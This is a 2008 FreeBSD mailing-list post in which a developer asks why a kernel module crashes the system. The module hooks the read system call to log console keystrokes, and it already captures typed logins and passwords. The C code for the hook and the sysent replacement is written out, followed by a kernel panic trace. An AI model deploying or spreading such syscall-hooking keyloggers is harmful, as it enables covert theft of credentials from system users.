From owner-freebsd-hackers@FreeBSD.ORG  Mon Jun 16 12:43:44 2008
Return-Path: <owner-freebsd-hackers@FreeBSD.ORG>
Delivered-To: freebsd-hackers@freebsd.org
Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34])
	by hub.freebsd.org (Postfix) with ESMTP id 0E06E106568D
	for <freebsd-hackers@freebsd.org>; Mon, 16 Jun 2008 12:43:44 +0000 (UTC)
	(envelope-from sigtrm@gmail.com)
Received: from rv-out-0506.google.com (rv-out-0506.google.com [209.85.198.225])
	by mx1.freebsd.org (Postfix) with ESMTP id D8A7E8FC2A
	for <freebsd-hackers@freebsd.org>; Mon, 16 Jun 2008 12:43:43 +0000 (UTC)
	(envelope-from sigtrm@gmail.com)
Received: by rv-out-0506.google.com with SMTP id b25so5806320rvf.43
	for <freebsd-hackers@freebsd.org>; Mon, 16 Jun 2008 05:43:43 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma;
	h=domainkey-signature:received:received:message-id:date:from:to
	:subject:mime-version:content-type:content-transfer-encoding
	:content-disposition;
	bh=OqV0cCHdHsEw1qbxlBwIIav/IteYJX141KfzNFBU9eo=;
	b=FpfvE95ZyJRtRnA3/WRb/Zy4SUzVZsImUfWkwBjbRfrOSzlG/Krci102CKL/LHqkMP
	DGvFVV9xFwBs7ESnkcjdK8ugMhQ6b4Kxm1c79O8gKGb44y1DKGU0KAKV2h4wUSoCUh9Y
	YSIcIUQnLQWnkoVPrVv1g7CVkqZzyVb4pgN5Y=
DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma;
	h=message-id:date:from:to:subject:mime-version:content-type
	:content-transfer-encoding:content-disposition;
	b=gdVIdL9vJbXvdwvMI56zUDkmhAAWvg/XVQ1Ff2qUyz05Ji5ces5UV1ufSdHuCFtKVa
	E/TBqtm8FHp0eauirLvNzWgTktewX0dDr847km0TEZy/Hyqc3RbxAizt7DOkX7+DPndX
	mJZwJkY5xxfI9C59NK7UWTF/DULI8zt+5G90M=
Received: by 10.141.114.15 with SMTP id r15mr3568779rvm.164.1213618516414;
	Mon, 16 Jun 2008 05:15:16 -0700 (PDT)
Received: by 10.141.76.5 with HTTP; Mon, 16 Jun 2008 05:15:16 -0700 (PDT)
Message-ID: <aed2bfaf0806160515x5ca0d3c1r85f473f4b24f6bc1@mail.gmail.com>
Date: Mon, 16 Jun 2008 14:15:16 +0200
From: "Lukasz Jaroszewski" <sigtrm@gmail.com>
To: freebsd-hackers@freebsd.org
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Subject: KLM - Fatal trap 12 on kldunload mod - sc replace
X-BeenThere: freebsd-hackers@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Technical Discussions relating to FreeBSD
	<freebsd-hackers.freebsd.org>
List-Unsubscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-hackers>, 
	<mailto:freebsd-hackers-request@freebsd.org?subject=unsubscribe>
List-Archive: <http://lists.freebsd.org/pipermail/freebsd-hackers>
List-Post: <mailto:freebsd-hackers@freebsd.org>
List-Help: <mailto:freebsd-hackers-request@freebsd.org?subject=help>
List-Subscribe: <http://lists.freebsd.org/mailman/listinfo/freebsd-hackers>,
	<mailto:freebsd-hackers-request@freebsd.org?subject=subscribe>
X-List-Received-Date: Mon, 16 Jun 2008 12:43:44 -0000

Hi,
I am trying to master kernel, first thought was to do simple replace
of system call(read), tho i have some issues which I cant figure. My
read_hack is supposed to log keystrokes, and it does.. tho only login
and password typed from console but without 1st char(typed root
appears as oot.), next after kldunload and changing tty system does
``fatal trap''. Here is the code i use:
---------------------------cut--------------------------

read_hack(struct thread *td, void *syscall_args)
{
        struct read_args *uap;
        uap = (struct read_args *)syscall_args;

        int error;
        char buf[1];
        int done;

        error = read(td, syscall_args);

        if (error || (!uap->nbyte) || (uap->nbyte > 1) || (uap->fd !=
0))
                return(error);
        copyinstr(uap->buf, buf, 1, &done);
        log(LOG_INFO, "mex: %c\n", buf[0]);

        return(error);
}

---------------------------cut---------------------

And in load() i do:

---------------------------cut---------------------
load(struct module *module, int cmd, void *arg)
{
        int error = 0;

        switch (cmd) {
        case MOD_LOAD:
                oldsy = sysent[SYS_read].sy_call;
                sysent[SYS_read].sy_call = (sy_call_t *)read_hack;
                break;
        case MOD_UNLOAD:
                sysent[SYS_read].sy_call = (sy_call_t *)oldsy;
                break;
        default:
                error = EOPNOTSUPP;
                break;
        }
        return(error);
}

---------------------------cut-------------------

After changing to other tty i get:

--------------------------------------------------------------------
# kgdb kernel.debug /var/crash/vmcore.5
[GDB will not be able to debug user-mode threads: /usr/lib/
libthread_db.so: Undefined symbol "ps_pglobal_lookup"]
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-marcel-freebsd".

Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xc23f656e
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc23f656e
stack pointer           = 0x28:0xcd63bc60
frame pointer           = 0x28:0xcd63bc80
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 1139 (csh)
panic: from debugger
cpuid = 0
Uptime: 34m47s
Physical memory: 234 MB
Dumping 37 MB: 22 6

#0  doadump () at pcpu.h:195
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
(kgdb) wh

;;------below reformatted text, tr'ed escape chars which made frame

around it-------
pcpu.h
177                         : "=m" (*(struct __s *)
(__pcpu_offset(name)))       \
178                         :
"r" (__s));                                       \
179             } else
{                                                        \
180                     *__PCPU_PTR(name) =
__val;                              \
181             }
\
182     }
183
184     #define PCPU_GET(member)        __PCPU_GET(pc_ ## member)
185     #define PCPU_ADD(member, val)   __PCPU_ADD(pc_ ## member, val)
186     #define PCPU_INC(member)        __PCPU_INC(pc_ ## member)
187     #define PCPU_PTR(member)        __PCPU_PTR(pc_ ## member)
188     #define PCPU_SET(member, val)   __PCPU_SET(pc_ ## member, val)
189
190     static __inline struct thread *
191     __curthread(void)
192     {
193             struct thread *td;
194
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
196             return (td);
197     }
198     #define curthread               (__curthread())
199
200     #else /* !lint || defined(__GNUCLIKE_ASM) &&
defined(__GNUCLIKE___TYPEOF) */
201
202     #error "this file needs to be ported to your compiler"
203
204     #endif /* lint, etc. */
205
206     #endif /* _KERNEL */
207
208     #endif /* !_MACHINE_PCPU_H_ */
209
210
211
212
213
214
;;-----------------------------------end of tr'ed
frame---------------------------------
kernel Thread 100076 In: doadump   Line: 195  PC: 0xc074f42c
Segmentation fault (core dumped)
                                #
# uname -a
FreeBSD  7.0-BETA3 FreeBSD 7.0-BETA3 #1: Sat Nov 24 11:19:31 UTC
2007     root@:/usr/obj/usr/src/sys/BSDKITCHEN  i386

I know its BETA, but i don't think its an issue, i guess i am doing
something wrong. I would like to know as much as one can/have will/
time to explain me, where is layer 8 error. :)

Best regards
LVJ